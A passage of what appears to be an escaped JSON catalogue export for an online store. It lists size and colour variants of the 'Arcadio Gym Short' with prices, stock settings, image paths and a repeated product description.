\"0\",\"size\":\"32\",\"color\":\"Black\"},\"957\":{\"sku\":\"MSH11-32-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Arcadio Gym Short-32-Blue\",\"description\":\"<p>The Arcadio Gym short is a basic-looking piece with a lot more than meets the eye: casual-yet-functional relaxed fit, comfortable waistband and adjustable drawstring. Everything you need, plus more.<\\/p>\\n<p>&bull; Royal blue cotton shorts.<br \\/>&bull; Built-in mesh brief. <br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Adjustable drawstring.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"20\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"arcadio-gym-short-32-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh11-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Blue\"},\"958\":{\"sku\":\"MSH11-32-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Arcadio Gym Short-32-Red\",\"description\":\"<p>The Arcadio Gym short is a basic-looking piece with a lot more than meets the eye: casual-yet-functional relaxed fit, comfortable waistband and adjustable drawstring. Everything you need, plus more.<\\/p>\\n<p>&bull; Royal blue cotton shorts.<br \\/>&bull; Built-in mesh brief. <br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Adjustable drawstring.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"20\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"arcadio-gym-short-32-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh11-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh11-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh11-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=32,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh11-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh11-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"32\",\"color\":\"Red\"},\"959\":{\"sku\":\"MSH11-33-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Arcadio Gym Short-33-Black\",\"description\":\"<p>The Arcadio Gym short is a basic-looking piece with a lot more than meets the eye: casual-yet-functional relaxed fit, comfortable waistband and adjustable drawstring. Everything you need, plus more.<\\/p>\\n<p>&bull; Royal blue cotton shorts.<br \\/>&bull; Built-in mesh brief. <br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Adjustable drawstring.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"20\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"arcadio-gym-short-33-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh11-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh11-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh11-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh11-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh11-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Black\"},\"960\":{\"sku\":\"MSH11-33-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Arcadio Gym Short-33-Blue\",\"description\":\"<p>The Arcadio Gym short is a basic-looking piece with a lot more than meets the eye: casual-yet-functional relaxed fit, comfortable waistband and adjustable drawstring. Everything you need, plus more.<\\/p>\\n<p>&bull; Royal blue cotton shorts.<br \\/>&bull; Built-in mesh brief. <br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Adjustable drawstring.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"20\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"arcadio-gym-short-33-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh11-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Blue\"},\"961\":{\"sku\":\"MSH11-33-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Arcadio Gym Short-33-Red\",\"description\":\"<p>The Arcadio Gym short is a basic-looking piece with a lot more than meets the eye: casual-yet-functional relaxed fit, comfortable waistband and adjustable drawstring. Everything you need, plus more.<\\/p>\\n<p>&bull; Royal blue cotton shorts.<br \\/>&bull; Built-in mesh brief. <br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Adjustable drawstring.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"20\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"arcadio-gym-short-33-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh11-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh11-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh11-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=33,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh11-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh11-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"33\",\"color\":\"Red\"},\"962\":{\"sku\":\"MSH11-34-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Arcadio Gym Short-34-Black\",\"description\":\"<p>The Arcadio Gym short is a basic-looking piece with a lot more than meets the eye: casual-yet-functional relaxed fit, comfortable waistband and adjustable drawstring. Everything you need, plus more.<\\/p>\\n<p>&bull; Royal blue cotton shorts.<br \\/>&bull; Built-in mesh brief. <br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Adjustable drawstring.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"20\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"arcadio-gym-short-34-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh11-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh11-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh11-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh11-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh11-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Black\"},\"963\":{\"sku\":\"MSH11-34-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Arcadio Gym Short-34-Blue\",\"description\":\"<p>The Arcadio Gym short is a basic-looking piece with a lot more than meets the eye: casual-yet-functional relaxed fit, comfortable waistband and adjustable drawstring. Everything you need, plus more.<\\/p>\\n<p>&bull; Royal blue cotton shorts.<br \\/>&bull; Built-in mesh brief. <br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Adjustable drawstring.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"20\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"arcadio-gym-short-34-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/msh11-blue_back.jpg\",\"image\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/msh11-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Blue\"},\"964\":{\"sku\":\"MSH11-34-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Arcadio Gym Short-34-Red\",\"description\":\"<p>The Arcadio Gym short is a basic-looking piece with a lot more than meets the eye: casual-yet-functional relaxed fit, comfortable waistband and adjustable drawstring. Everything you need, plus more.<\\/p>\\n<p>&bull; Royal blue cotton shorts.<br \\/>&bull; Built-in mesh brief. <br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Adjustable drawstring.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"20\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"arcadio-gym-short-34-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh11-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh11-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh11-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=34,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh11-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh11-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"34\",\"color\":\"Red\"},\"965\":{\"sku\":\"MSH11-36-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Bottoms\\/Shorts\",\"product_websites\":\"base\",\"name\":\"Arcadio Gym Short-36-Black\",\"description\":\"<p>The Arcadio Gym short is a basic-looking piece with a lot more than meets the eye: casual-yet-functional relaxed fit, comfortable waistband and adjustable drawstring. Everything you need, plus more.<\\/p>\\n<p>&bull; Royal blue cotton shorts.<br \\/>&bull; Built-in mesh brief. <br \\/>&bull; 87% Spandex 13% Lycra.<br \\/>&bull; Adjustable drawstring.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"20\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"arcadio-gym-short-36-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/msh11-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/msh11-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/msh11-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=36,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/msh11-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/msh11-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"36\",\"color\":\"Black\"},\"966\":{\"sku\":\"MSH11-36-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default 